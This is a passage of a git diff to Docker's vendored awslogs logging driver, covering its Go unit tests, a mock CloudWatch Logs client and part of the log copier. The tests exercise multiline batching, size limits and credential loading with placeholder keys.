logger.Info{ Config: map[string]string{ regionKey: "us-east-1", }, } - client, err := newAWSLogsClient(ctx) + client, err := newAWSLogsClient(info) if err != nil { t.Fatal(err) } @@ -59,7 +91,7 @@ func TestNewAWSLogsClientUserAgentHandler(t *testing.T) { } func TestNewAWSLogsClientRegionDetect(t *testing.T) { - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{}, } @@ -71,7 +103,7 @@ func TestNewAWSLogsClientRegionDetect(t *testing.T) { successResult: "us-east-1", } - _, err := newAWSLogsClient(ctx) + _, err := newAWSLogsClient(info) if err != nil { t.Fatal(err) } @@ -99,8 +131,39 @@ func TestCreateSuccess(t *testing.T) { t.Errorf("Expected LogGroupName to be %s", groupName) } if argument.LogStreamName == nil { + t.Fatal("Expected non-nil LogStreamName") + } + if *argument.LogStreamName != streamName { + t.Errorf("Expected LogStreamName to be %s", streamName) + } +} + +func TestCreateLogGroupSuccess(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + logCreateGroup: true, + } + mockClient.createLogGroupResult <- &createLogGroupResult{} + mockClient.createLogStreamResult <- &createLogStreamResult{} + + err := stream.create() + + if err != nil { + t.Errorf("Received unexpected err: %v\n", err) + } + argument := <-mockClient.createLogStreamArgument + if argument.LogGroupName == nil { t.Fatal("Expected non-nil LogGroupName") } + if *argument.LogGroupName != groupName { + t.Errorf("Expected LogGroupName to be %s", groupName) + } + if argument.LogStreamName == nil { + t.Fatal("Expected non-nil LogStreamName") + } if *argument.LogStreamName != streamName { t.Errorf("Expected LogStreamName to be %s", streamName) } @@ -112,7 +175,7 @@ func TestCreateError(t *testing.T) { client: mockClient, } mockClient.createLogStreamResult <- &createLogStreamResult{ - errorResult: errors.New("Error!"), + errorResult: errors.New("Error"), } err := stream.create() @@ -138,6 +201,93 @@ func TestCreateAlreadyExists(t *testing.T) { } } +func TestLogClosed(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + closed: true, + } + err := stream.Log(&logger.Message{}) + if err == nil { + t.Fatal("Expected non-nil error") + } +} + +func TestLogBlocking(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + messages: make(chan *logger.Message), + } + + errorCh := make(chan error, 1) + started := make(chan bool) + go func() { + started <- true + err := stream.Log(&logger.Message{}) + errorCh <- err + }() + <-started + select { + case err := <-errorCh: + t.Fatal("Expected stream.Log to block: ", err) + default: + break + } + select { + case <-stream.messages: + break + default: + t.Fatal("Expected to be able to read from stream.messages but was unable to") + } + select { + case err := <-errorCh: + if err != nil { + t.Fatal(err) + } + case <-time.After(30 * time.Second): + t.Fatal("timed out waiting for read") + } +} + +func TestLogNonBlockingBufferEmpty(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + messages: make(chan *logger.Message, 1), + logNonBlocking: true, + } + err := stream.Log(&logger.Message{}) + if err != nil { + t.Fatal(err) + } +} + +func TestLogNonBlockingBufferFull(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + messages: make(chan *logger.Message, 1), + logNonBlocking: true, + } + stream.messages <- &logger.Message{} + errorCh := make(chan error) + started := make(chan bool) + go func() { + started <- true + err := stream.Log(&logger.Message{}) + errorCh <- err + }() + <-started + select { + case err := <-errorCh: + if err == nil { + t.Fatal("Expected non-nil error") + } + case <-time.After(30 * time.Second): + t.Fatal("Expected Log call to not block") + } +} func TestPublishBatchSuccess(t *testing.T) { mockClient := newMockClient() stream := &logStream{ @@ -159,7 +309,7 @@ func TestPublishBatchSuccess(t *testing.T) { }, } - stream.publishBatch(events) + stream.publishBatch(testEventBatch(events)) if stream.sequenceToken == nil { t.Fatal("Expected non-nil sequenceToken") } @@ -193,7 +343,7 @@ func TestPublishBatchError(t *testing.T) { sequenceToken: aws.String(sequenceToken), } mockClient.putLogEventsResult <- &putLogEventsResult{ - errorResult: errors.New("Error!"), + errorResult: errors.New("Error"), } events := []wrappedEvent{ @@ -204,7 +354,7 @@ func TestPublishBatchError(t *testing.T) { }, } - stream.publishBatch(events) + stream.publishBatch(testEventBatch(events)) if stream.sequenceToken == nil { t.Fatal("Expected non-nil sequenceToken") } @@ -238,7 +388,7 @@ func TestPublishBatchInvalidSeqSuccess(t *testing.T) { }, } - stream.publishBatch(events) + stream.publishBatch(testEventBatch(events)) if stream.sequenceToken == nil { t.Fatal("Expected non-nil sequenceToken") } @@ -301,7 +451,7 @@ func TestPublishBatchAlreadyAccepted(t *testing.T) { }, } - stream.publishBatch(events) + stream.publishBatch(testEventBatch(events)) if stream.sequenceToken == nil { t.Fatal("Expected non-nil sequenceToken") } @@ -347,8 +497,9 @@ func TestCollectBatchSimple(t *testing.T) { C: ticks, } } - - go stream.collectBatch() + d := make(chan bool) + close(d) + go stream.collectBatch(d) stream.Log(&logger.Message{ Line: []byte(logline), @@ -391,7 +542,9 @@ func TestCollectBatchTicker(t *testing.T) { } } - go stream.collectBatch() + d := make(chan bool) + close(d) + go stream.collectBatch(d) stream.Log(&logger.Message{ Line: []byte(logline + " 1"), @@ -440,6 +593,295 @@ func TestCollectBatchTicker(t *testing.T) { } +func TestCollectBatchMultilinePattern(t *testing.T) { + mockClient := newMockClient() + multilinePattern := regexp.MustCompile("xxxx") + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + multilinePattern: multilinePattern, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + d := make(chan bool) + close(d) + go stream.collectBatch(d) + + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Now(), + }) + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Now(), + }) + stream.Log(&logger.Message{ + Line: []byte("xxxx " + logline), + Timestamp: time.Now(), + }) + + ticks <- time.Now() + + // Verify single multiline event + argument := <-mockClient.putLogEventsArgument + assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput") + assert.Check(t, is.Equal(1, len(argument.LogEvents)), "Expected single multiline event") + assert.Check(t, is.Equal(logline+"\n"+logline+"\n", *argument.LogEvents[0].Message), "Received incorrect multiline message") + + stream.Close() + + // Verify single event + argument = <-mockClient.putLogEventsArgument + assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput") + assert.Check(t, is.Equal(1, len(argument.LogEvents)), "Expected single multiline event") + assert.Check(t, is.Equal("xxxx "+logline+"\n", *argument.LogEvents[0].Message), "Received incorrect multiline message") +} + +func BenchmarkCollectBatch(b *testing.B) { + for i := 0; i < b.N; i++ { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + d := make(chan bool) + close(d) + go stream.collectBatch(d) + stream.logGenerator(10, 100) + ticks <- time.Time{} + stream.Close() + } +} + +func BenchmarkCollectBatchMultilinePattern(b *testing.B) { + for i := 0; i < b.N; i++ { + mockClient := newMockClient() + multilinePattern := regexp.MustCompile(`\d{4}-(?:0[1-9]|1[0-2])-(?:0[1-9]|[1,2][0-9]|3[0,1]) (?:[0,1][0-9]|2[0-3]):[0-5][0-9]:[0-5][0-9]`) + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + multilinePattern: multilinePattern, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + d := make(chan bool) + close(d) + go stream.collectBatch(d) + stream.logGenerator(10, 100) + ticks <- time.Time{} + stream.Close() + } +} + +func TestCollectBatchMultilinePatternMaxEventAge(t *testing.T) { + mockClient := newMockClient() + multilinePattern := regexp.MustCompile("xxxx") + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + multilinePattern: multilinePattern, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + d := make(chan bool) + close(d) + go stream.collectBatch(d) + + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Now(), + }) + + // Log an event 1 second later + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Now().Add(time.Second), + }) + + // Fire ticker batchPublishFrequency seconds later + ticks <- time.Now().Add(batchPublishFrequency + time.Second) + + // Verify single multiline event is flushed after maximum event buffer age (batchPublishFrequency) + argument := <-mockClient.putLogEventsArgument + assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput") + assert.Check(t, is.Equal(1, len(argument.LogEvents)), "Expected single multiline event") + assert.Check(t, is.Equal(logline+"\n"+logline+"\n", *argument.LogEvents[0].Message), "Received incorrect multiline message") + + // Log an event 1 second later + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Now().Add(time.Second), + }) + + // Fire ticker another batchPublishFrequency seconds later + ticks <- time.Now().Add(2*batchPublishFrequency + time.Second) + + // Verify the event buffer is truly flushed - we should only receive a single event + argument = <-mockClient.putLogEventsArgument + assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput") + assert.Check(t, is.Equal(1, len(argument.LogEvents)), "Expected single multiline event") + assert.Check(t, is.Equal(logline+"\n", *argument.LogEvents[0].Message), "Received incorrect multiline message") + stream.Close() +} + +func TestCollectBatchMultilinePatternNegativeEventAge(t *testing.T) { + mockClient := newMockClient() + multilinePattern := regexp.MustCompile("xxxx") + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + multilinePattern: multilinePattern, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + d := make(chan bool) + close(d) + go stream.collectBatch(d) + + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Now(), + }) + + // Log an event 1 second later + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Now().Add(time.Second), + }) + + // Fire ticker in past to simulate negative event buffer age + ticks <- time.Now().Add(-time.Second) + + // Verify single multiline event is flushed with a negative event buffer age + argument := <-mockClient.putLogEventsArgument + assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput") + assert.Check(t, is.Equal(1, len(argument.LogEvents)), "Expected single multiline event") + assert.Check(t, is.Equal(logline+"\n"+logline+"\n", *argument.LogEvents[0].Message), "Received incorrect multiline message") + + stream.Close() +} + +func TestCollectBatchMultilinePatternMaxEventSize(t *testing.T) { + mockClient := newMockClient() + multilinePattern := regexp.MustCompile("xxxx") + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + multilinePattern: multilinePattern, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + d := make(chan bool) + close(d) + go stream.collectBatch(d) + + // Log max event size + longline := strings.Repeat("A", maximumBytesPerEvent) + stream.Log(&logger.Message{ + Line: []byte(longline), + Timestamp: time.Now(), + }) + + // Log short event + shortline := strings.Repeat("B", 100) + stream.Log(&logger.Message{ + Line: []byte(shortline), + Timestamp: time.Now(), + }) + + // Fire ticker + ticks <- time.Now().Add(batchPublishFrequency) + + // Verify multiline events + // We expect a maximum sized event with no new line characters and a + // second short event with a new line character at the end + argument := <-mockClient.putLogEventsArgument + assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput") + assert.Check(t, is.Equal(2, len(argument.LogEvents)), "Expected two events") + assert.Check(t, is.Equal(longline, *argument.LogEvents[0].Message), "Received incorrect multiline message") + assert.Check(t, is.Equal(shortline+"\n", *argument.LogEvents[1].Message), "Received incorrect multiline message") + stream.Close() +} + func TestCollectBatchClose(t *testing.T) { mockClient := newMockClient() stream := &logStream{ @@ -461,7 +903,9 @@ func TestCollectBatchClose(t *testing.T) { } } - go stream.collectBatch() + d := make(chan bool) + close(d) + go stream.collectBatch(d) stream.Log(&logger.Message{ Line: []byte(logline), @@ -504,7 +948,9 @@ func TestCollectBatchLineSplit(t *testing.T) { } } - go stream.collectBatch() + d := make(chan bool) + close(d) + go stream.collectBatch(d) longline := strings.Repeat("A", maximumBytesPerEvent) stream.Log(&logger.Message{ @@ -551,7 +997,9 @@ func TestCollectBatchMaxEvents(t *testing.T) { } } - go stream.collectBatch() + d := make(chan bool) + close(d) + go stream.collectBatch(d) line := "A" for i := 0; i <= maximumLogEventsPerPut; i++ { @@ -582,7 +1030,8 @@ func TestCollectBatchMaxEvents(t *testing.T) { } func TestCollectBatchMaxTotalBytes(t *testing.T) { - mockClient := newMockClientBuffered(1) + expectedPuts := 2 + mockClient := newMockClientBuffered(expectedPuts) stream := &logStream{ client: mockClient, logGroupName: groupName, @@ -590,11 +1039,14 @@ func TestCollectBatchMaxTotalBytes(t *testing.T) { sequenceToken: aws.String(sequenceToken), messages: make(chan *logger.Message), } - mockClient.putLogEventsResult <- &putLogEventsResult{ - successResult: &cloudwatchlogs.PutLogEventsOutput{ - NextSequenceToken: aws.String(nextSequenceToken), - }, + for i := 0; i < expectedPuts; i++ { + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } } + var ticks = make(chan time.Time) newTicker = func(_ time.Duration) *time.Ticker { return &time.Ticker{ @@ -602,34 +1054,61 @@ func TestCollectBatchMaxTotalBytes(t *testing.T) { } } - go stream.collectBatch() + d := make(chan bool) + close(d) + go stream.collectBatch(d) - longline := strings.Repeat("A", maximumBytesPerPut) + numPayloads := maximumBytesPerPut / (maximumBytesPerEvent + perEventBytes) + // maxline is the maximum line that could be submitted after + // accounting for its overhead. + maxline := strings.Repeat("A", maximumBytesPerPut-(perEventBytes*numPayloads)) + // This will be split and batched up to the `maximumBytesPerPut' + // (+/- `maximumBytesPerEvent'). This /should/ be aligned, but + // should also tolerate an offset within that range. stream.Log(&logger.Message{ - Line: []byte(longline + "B"), + Line: []byte(maxline[:len(maxline)/2]), + Timestamp: time.Time{}, + }) + stream.Log(&logger.Message{ + Line: []byte(maxline[len(maxline)/2:]), + Timestamp: time.Time{}, + }) + stream.Log(&logger.Message{ + Line: []byte("B"), Timestamp: time.Time{}, }) - // no ticks + // no ticks, guarantee batch by size (and chan close) stream.Close() argument := <-mockClient.putLogEventsArgument if argument == nil { t.Fatal("Expected non-nil PutLogEventsInput") } - bytes := 0 + + // Should total to the maximum allowed bytes. + eventBytes := 0 for _, event := range argument.LogEvents { - bytes += len(*event.Message) + eventBytes += len(*event.Message) + } + eventsOverhead := len(argument.LogEvents) * perEventBytes + payloadTotal := eventBytes + eventsOverhead + // lowestMaxBatch allows the payload to be offset if the messages + // don't lend themselves to align with the maximum event size. + lowestMaxBatch := maximumBytesPerPut - maximumBytesPerEvent + + if payloadTotal > maximumBytesPerPut { + t.Errorf("Expected <= %d bytes but was %d", maximumBytesPerPut, payloadTotal) } - if bytes > maximumBytesPerPut { - t.Errorf("Expected <= %d bytes but was %d", maximumBytesPerPut, bytes) + if payloadTotal < lowestMaxBatch { + t.Errorf("Batch to be no less than %d but was %d", lowestMaxBatch, payloadTotal) } argument = <-mockClient.putLogEventsArgument if len(argument.LogEvents) != 1 { t.Errorf("Expected LogEvents to contain 1 elements, but contains %d", len(argument.LogEvents)) } - message := *argument.LogEvents[0].Message + message := *argument.LogEvents[len(argument.LogEvents)-1].Message if message[len(message)-1:] != "B" { t.Errorf("Expected message to be %s but was %s", "B", message[len(message)-1:]) } @@ -656,10 +1135,12 @@ func TestCollectBatchWithDuplicateTimestamps(t *testing.T) { } } - go stream.collectBatch() + d := make(chan bool) + close(d) + go stream.collectBatch(d) + var expectedEvents []*cloudwatchlogs.InputLogEvent times := maximumLogEventsPerPut - expectedEvents := []*cloudwatchlogs.InputLogEvent{} timestamp := time.Now() for i := 0; i < times; i++ { line := fmt.Sprintf("%d", i) @@ -693,14 +1174,66 @@ func TestCollectBatchWithDuplicateTimestamps(t *testing.T) { } } +func TestParseLogOptionsMultilinePattern(t *testing.T) { + info := logger.Info{ + Config: map[string]string{ + multilinePatternKey: "^xxxx", + }, + } + + multilinePattern, err := parseMultilineOptions(info) + assert.Check(t, err, "Received unexpected error") + assert.Check(t, multilinePattern.MatchString("xxxx"), "No multiline pattern match found") +} + +func TestParseLogOptionsDatetimeFormat(t *testing.T) { + datetimeFormatTests := []struct { + format string + match string + }{ + {"%d/%m/%y %a %H:%M:%S%L %Z", "31/12/10 Mon 08:42:44.345 NZDT"}, + {"%Y-%m-%d %A %I:%M:%S.%f%p%z", "2007-12-04 Monday 08:42:44.123456AM+1200"}, + {"%b|%b|%b|%b|%b|%b|%b|%b|%b|%b|%b|%b", "Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec"}, + {"%B|%B|%B|%B|%B|%B|%B|%B|%B|%B|%B|%B", "January|February|March|April|May|June|July|August|September|October|November|December"}, + {"%A|%A|%A|%A|%A|%A|%A", "Monday|Tuesday|Wednesday|Thursday|Friday|Saturday|Sunday"}, + {"%a|%a|%a|%a|%a|%a|%a", "Mon|Tue|Wed|Thu|Fri|Sat|Sun"}, + {"Day of the week: %w, Day of the year: %j", "Day of the week: 4, Day of the year: 091"}, + } + for _, dt := range datetimeFormatTests { + t.Run(dt.match, func(t *testing.T) { + info := logger.Info{ + Config: map[string]string{ + datetimeFormatKey: dt.format, + }, + } + multilinePattern, err := parseMultilineOptions(info) + assert.Check(t, err, "Received unexpected error") + assert.Check(t, multilinePattern.MatchString(dt.match), "No multiline pattern match found") + }) + } +} + +func TestValidateLogOptionsDatetimeFormatAndMultilinePattern(t *testing.T) { + cfg := map[string]string{ + multilinePatternKey: "^xxxx", + datetimeFormatKey: "%Y-%m-%d", + logGroupKey: groupName, + } + conflictingLogOptionsError := "you cannot configure log opt 'awslogs-datetime-format' and 'awslogs-multiline-pattern' at the same time" + + err := ValidateLogOpt(cfg) + assert.Check(t, err != nil, "Expected an error") + assert.Check(t, is.Equal(err.Error(), conflictingLogOptionsError), "Received invalid error") +} + func TestCreateTagSuccess(t *testing.T) { mockClient := newMockClient() - ctx := logger.Context{ + info := logger.Info{ ContainerName: "/test-container", ContainerID: "container-abcdefghijklmnopqrstuvwxyz01234567890", Config: map[string]string{"tag": "{{.Name}}/{{.FullID}}"}, } - logStreamName, e := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + logStreamName, e := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate) if e != nil { t.Errorf("Error generating tag: %q", e) } @@ -722,3 +1255,137 @@ func TestCreateTagSuccess(t *testing.T) { t.Errorf("Expected LogStreamName to be %s", "test-container/container-abcdefghijklmnopqrstuvwxyz01234567890") } } + +func BenchmarkUnwrapEvents(b *testing.B) { + events := make([]wrappedEvent, maximumLogEventsPerPut) + for i := 0; i < maximumLogEventsPerPut; i++ { + mes := strings.Repeat("0", maximumBytesPerEvent) + events[i].inputLogEvent = &cloudwatchlogs.InputLogEvent{ + Message: &mes, + } + } + + b.ResetTimer() + for i := 0; i < b.N; i++ { + res := unwrapEvents(events) + assert.Check(b, is.Len(res, maximumLogEventsPerPut)) + } +} + +func TestNewAWSLogsClientCredentialEndpointDetect(t *testing.T) { + // required for the cloudwatchlogs client + os.Setenv("AWS_REGION", "us-west-2") + defer os.Unsetenv("AWS_REGION") + + credsResp := `{ + "AccessKeyId" : "test-access-key-id", + "SecretAccessKey": "test-secret-access-key" + }` + + expectedAccessKeyID := "test-access-key-id" + expectedSecretAccessKey := "test-secret-access-key" + + testServer := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/json") + fmt.Fprintln(w, credsResp) + })) + defer testServer.Close() + + // set the SDKEndpoint in the driver + newSDKEndpoint = testServer.URL + + info := logger.Info{ + Config: map[string]string{}, + } + + info.Config["awslogs-credentials-endpoint"] = "/creds" + + c, err := newAWSLogsClient(info) + assert.Check(t, err) + + client := c.(*cloudwatchlogs.CloudWatchLogs) + + creds, err := client.Config.Credentials.Get() + assert.Check(t, err) + + assert.Check(t, is.Equal(expectedAccessKeyID, creds.AccessKeyID)) + assert.Check(t, is.Equal(expectedSecretAccessKey, creds.SecretAccessKey)) +} + +func TestNewAWSLogsClientCredentialEnvironmentVariable(t *testing.T) { + // required for the cloudwatchlogs client + os.Setenv("AWS_REGION", "us-west-2") + defer os.Unsetenv("AWS_REGION") + + expectedAccessKeyID := "test-access-key-id" + expectedSecretAccessKey := "test-secret-access-key" + + os.Setenv("AWS_ACCESS_KEY_ID", expectedAccessKeyID) + defer os.Unsetenv("AWS_ACCESS_KEY_ID") + + os.Setenv("AWS_SECRET_ACCESS_KEY", expectedSecretAccessKey) + defer os.Unsetenv("AWS_SECRET_ACCESS_KEY") + + info := logger.Info{ + Config: map[string]string{}, + } + + c, err := newAWSLogsClient(info) + assert.Check(t, err) + + client := c.(*cloudwatchlogs.CloudWatchLogs) + + creds, err := client.Config.Credentials.Get() + assert.Check(t, err) + + assert.Check(t, is.Equal(expectedAccessKeyID, creds.AccessKeyID)) + assert.Check(t, is.Equal(expectedSecretAccessKey, creds.SecretAccessKey)) + +} + +func TestNewAWSLogsClientCredentialSharedFile(t *testing.T) { + // required for the cloudwatchlogs client + os.Setenv("AWS_REGION", "us-west-2") + defer os.Unsetenv("AWS_REGION") + + expectedAccessKeyID := "test-access-key-id" + expectedSecretAccessKey := "test-secret-access-key" + + contentStr := ` + [default] + aws_access_key_id = "test-access-key-id" + aws_secret_access_key = "test-secret-access-key" + ` + content := []byte(contentStr) + + tmpfile, err := ioutil.TempFile("", "example") + defer os.Remove(tmpfile.Name()) // clean up + assert.Check(t, err) + + _, err = tmpfile.Write(content) + assert.Check(t, err) + + err = tmpfile.Close() + assert.Check(t, err) + + os.Unsetenv("AWS_ACCESS_KEY_ID") + os.Unsetenv("AWS_SECRET_ACCESS_KEY") + + os.Setenv("AWS_SHARED_CREDENTIALS_FILE", tmpfile.Name()) + defer os.Unsetenv("AWS_SHARED_CREDENTIALS_FILE") + + info := logger.Info{ + Config: map[string]string{}, + } + + c, err := newAWSLogsClient(info) + assert.Check(t, err) + + client := c.(*cloudwatchlogs.CloudWatchLogs) + + creds, err := client.Config.Credentials.Get() + assert.Check(t, err) + + assert.Check(t, is.Equal(expectedAccessKeyID, creds.AccessKeyID)) + assert.Check(t, is.Equal(expectedSecretAccessKey, creds.SecretAccessKey)) +} diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go index b768a3d7ec..155e602b8c 100644 --- a/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go @@ -1,14 +1,25 @@ -package awslogs +package awslogs // import "github.com/docker/docker/daemon/logger/awslogs" -import "github.com/aws/aws-sdk-go/service/cloudwatchlogs" +import ( + "fmt" + + "github.com/aws/aws-sdk-go/service/cloudwatchlogs" +) type mockcwlogsclient struct { + createLogGroupArgument chan *cloudwatchlogs.CreateLogGroupInput + createLogGroupResult chan *createLogGroupResult createLogStreamArgument chan *cloudwatchlogs.CreateLogStreamInput createLogStreamResult chan *createLogStreamResult putLogEventsArgument chan *cloudwatchlogs.PutLogEventsInput putLogEventsResult chan *putLogEventsResult } +type createLogGroupResult struct { + successResult *cloudwatchlogs.CreateLogGroupOutput + errorResult error +} + type createLogStreamResult struct { successResult *cloudwatchlogs.CreateLogStreamOutput errorResult error @@ -21,6 +32,8 @@ type putLogEventsResult struct { func newMockClient() *mockcwlogsclient { return &mockcwlogsclient{ + createLogGroupArgument: make(chan *cloudwatchlogs.CreateLogGroupInput, 1), + createLogGroupResult: make(chan *createLogGroupResult, 1), createLogStreamArgument: make(chan *cloudwatchlogs.CreateLogStreamInput, 1), createLogStreamResult: make(chan *createLogStreamResult, 1), putLogEventsArgument: make(chan *cloudwatchlogs.PutLogEventsInput, 1), @@ -37,6 +50,12 @@ func newMockClientBuffered(buflen int) *mockcwlogsclient { } } +func (m *mockcwlogsclient) CreateLogGroup(input *cloudwatchlogs.CreateLogGroupInput) (*cloudwatchlogs.CreateLogGroupOutput, error) { + m.createLogGroupArgument <- input + output := <-m.createLogGroupResult + return output.successResult, output.errorResult +} + func (m *mockcwlogsclient) CreateLogStream(input *cloudwatchlogs.CreateLogStreamInput) (*cloudwatchlogs.CreateLogStreamOutput, error) { m.createLogStreamArgument <- input output := <-m.createLogStreamResult @@ -52,7 +71,30 @@ func (m *mockcwlogsclient) PutLogEvents(input *cloudwatchlogs.PutLogEventsInput) LogGroupName: input.LogGroupName, LogStreamName: input.LogStreamName, } + + // Intended mock output output := <-m.putLogEventsResult + + // Checked enforced limits in mock + totalBytes := 0 + for _, evt := range events { + if evt.Message == nil { + continue + } + eventBytes := len([]byte(*evt.Message)) + if eventBytes > maximumBytesPerEvent { + // exceeded per event message size limits + return nil, fmt.Errorf("maximum bytes per event exceeded: Event too large %d, max allowed: %d", eventBytes, maximumBytesPerEvent) + } + // total event bytes including overhead + totalBytes += eventBytes + perEventBytes + } + + if totalBytes > maximumBytesPerPut { + // exceeded per put maximum size limit + return nil, fmt.Errorf("maximum bytes per put exceeded: Upload too large %d, max allowed: %d", totalBytes, maximumBytesPerPut) + } + return output.successResult, output.errorResult } diff --git a/vendor/github.com/docker/docker/daemon/logger/copier.go b/vendor/github.com/docker/docker/daemon/logger/copier.go index 10ab46e162..e24272fa6d 100644 --- a/vendor/github.com/docker/docker/daemon/logger/copier.go +++ b/vendor/github.com/docker/docker/daemon/logger/copier.go @@ -1,4 +1,4 @@ -package logger +package logger // import "github.com/docker/docker/daemon/logger" import ( "bytes" @@ -6,12 +6,19 @@ import ( "sync" "time" - "github.com/Sirupsen/logrus" + types "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/pkg/stringid" + "github.com/sirupsen/logrus" ) const ( - bufSize = 16 * 1024 + // readSize is the maximum bytes read during a single read + // operation. readSize = 2 * 1024 + + // defaultBufSize provides a reasonable default for loggers that do + // not have an external limit to impose on log line size. + defaultBufSize = 16 * 1024 ) // Copier can copy logs from specified sources to Logger and attach Timestamp. @@ -44,10 +51,20 @@ func (c *Copier) Run() { func (c *Copier) copySrc(name string, src io.Reader) { defer c.copyJobs.Done() + + bufSize := defaultBufSize + if sizedLogger, ok := c.dst.(SizedLogger); ok { + bufSize = sizedLogger.BufSize() + } buf := make([]byte, bufSize) + n := 0 eof := false - msg := &Message{Source: name} + var partialid string + var partialTS time.Time + var ordinal int + firstPartial := true + hasMorePartial := false for { select { @@ -64,6 +81,7 @@ func (c *Copier) copySrc(name string, src io.Reader) { read, err := src.Read(buf[n:upto]) if err != nil { if err != io.EOF { + logReadsFailedCount.Inc(1) logrus.Errorf("Error scanning log stream: %s", err) return } @@ -77,15 +95,33 @@ func (c *Copier) copySrc(name string, src io.Reader) { } // Break up the data that we've buffered up into lines, and log each in turn. p := 0 - for q := bytes.Index(buf[p:n], []byte{'\n'}); q >= 0; q = bytes.Index(buf[p:n], []byte{'\n'}) { - msg.Line = buf[p : p+q] - msg.Timestamp = time.Now().UTC() - msg.Partial = false + + for q := bytes.IndexByte(buf[p:n], '\n'); q >= 0; q = bytes.IndexByte(buf[p:n], '\n') { select { case <-c.closed: return default: + msg := NewMessage() + msg.Source = name + msg.Line = append(msg.Line, buf[p:p+q]...) + + if hasMorePartial { + msg.PLogMetaData = &types.PartialLogMetaData{ID: partialid, Ordinal: ordinal, Last: true} + + // reset + partialid = "" + ordinal = 0 + firstPartial = true + hasMorePartial = false + } + if msg.PLogMetaData == nil { + msg.Timestamp = time.Now().UTC() + } else { + msg.Timestamp = partialTS + } + if logErr := c.dst.Log(msg); logErr != nil { + logWritesFailedCount.Inc(1) logrus.Errorf("Failed to log msg %q for logger %s: %s", msg.Line, c.dst.Name(), logErr) } } @@ -96,10 +132,29 @@ func (c *Copier) copySrc(name string, src io.Reader) { // noting that it's a partial log line. if eof || (p == 0 && n == len(buf)) { if p < n { - msg.Line = buf[p:n] - msg.Timestamp = time.Now().UTC() - msg.Partial = true + msg := NewMessage() + msg.Source = name + msg.Line = append(msg.Line, buf[p:n]...) + + // Generate unique partialID for first partial. Use it across partials. + // 